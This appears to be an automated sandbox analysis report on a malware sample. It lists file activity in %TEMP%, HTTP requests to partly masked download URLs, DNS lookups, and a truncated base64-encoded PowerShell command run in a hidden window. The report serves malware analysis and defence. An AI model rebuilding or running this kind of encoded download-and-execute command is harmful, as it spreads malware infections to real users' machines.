Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...
Modifies file system
Creates the following files
- %TEMP%\nmdj.exe
Deletes the following files
- %TEMP%\nmdj.exe
Substitutes the following files
- %TEMP%\nmdj.exe
Network activity
TCP
HTTP GET requests
- http://be###gik.com/wp-includes/e6eT18030/
- http://ao###tunes.com/9gipx/wOOY59/
- http://yo###an.co.uk/hWftFfZpx/uRkkm0115/
UDP
- DNS ASK ha####mnhat.mizi.vn
- DNS ASK be###gik.com
- DNS ASK ao###tunes.com
- DNS ASK yo###an.co.uk
- DNS ASK se######nailsfranklin.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...' (with hidden window)
